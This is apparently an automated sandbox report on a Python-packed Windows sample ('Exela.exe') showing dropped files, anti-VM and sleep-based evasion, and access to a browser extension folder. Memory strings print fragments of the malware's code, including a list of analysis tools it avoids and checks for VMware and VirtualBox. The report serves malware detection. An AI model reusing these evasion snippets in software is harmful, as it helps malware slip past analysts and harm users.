Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_queue.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_http_parser.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_cffi_backend.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\frozenlist\_frozenlist.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\python3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\yarl\_quoting_c.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_parser.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\python311.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_websocket.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_helpers.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\frozenlist\_frozenlist.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\yarl\_quoting_c.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\python3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography\hazmat\bindings\_rust.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_ssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_uuid.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_websocket.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_writer.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography\hazmat\bindings\_rust.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\multidict\_multidict.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_ssl.pyd Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364 Thread sleep count: 4603 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372 Thread sleep count: 919 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7624 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF72AA8842C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA78AF0 FindFirstFileExW,FindClose, 0_2_00007FF72AA78AF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA924C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF72AA924C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF72AA8842C
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 81_2_00007FF6E3A7842C
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A68AF0 FindFirstFileExW,FindClose, 81_2_00007FF6E3A68AF0
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A824C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 81_2_00007FF6E3A824C4
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 81_2_00007FF6E3A7842C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg Jump to behavior
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwareuser.exe"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmwaretray.exe", # VMware
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmusrvc.exe"P
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vboxservice.exe", # VirtualBox
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: *Hyper-V Administrators
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: self.banned_process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: elif b"vmware" in stdout2.lower():
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: b'VMware'*
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1666815528.000002DCCF02C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969808694.000002DCCF02E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969112805.000002DCCEF3A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965276250.000002DCCEF35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1972389276.000002DCCF030000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969639585.000002DCCEF69000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1988347841.000002DCCF030000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670341282.000002DCCEF78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmsrvc.exe", # VirtualBox
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
Source: ROUTE.EXE, 0000004B.00000002.1787944348.000001F836B19000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971539043.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965135302.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990080929.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd.exepC
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vboxtray.exe"
Source: svchost.exe, 0000003B.00000002.2894048217.000001B772640000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHp
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: b"vmware"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice.exe0E
Source: net1.exe, 00000041.00000002.1769944315.00000281E77F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Administrators
Source: ARP.EXE, 0000004C.00000002.1788850433.000001A5F0C27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1955400520.000002DCD1507000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmusrvc.ex
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmtoolsd.exe", # VMware
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971539043.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965135302.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990080929.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return any(x.lower() in decoded_output[2].strip().lower() for x in ("virtualbox", "vmware"))
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vboxtray.exe", # VirtualBox
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware0*
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: b'VMware'
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vboxservice.exe"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwaretray.exe"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwaretray.exe"p2
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser.exe04
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray.exepD
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmware"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 'qemu'
Source: sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service InterfacevmicguestinterfaceVirtual DiskvdsCredential ManagerVaultSvcVolumetric Audio Compositor ServiceVacSvcUpdate Orchestrator ServiceU
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmtoolsd.exe"
Source: sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERVICE_NAME: vmicheartbeat
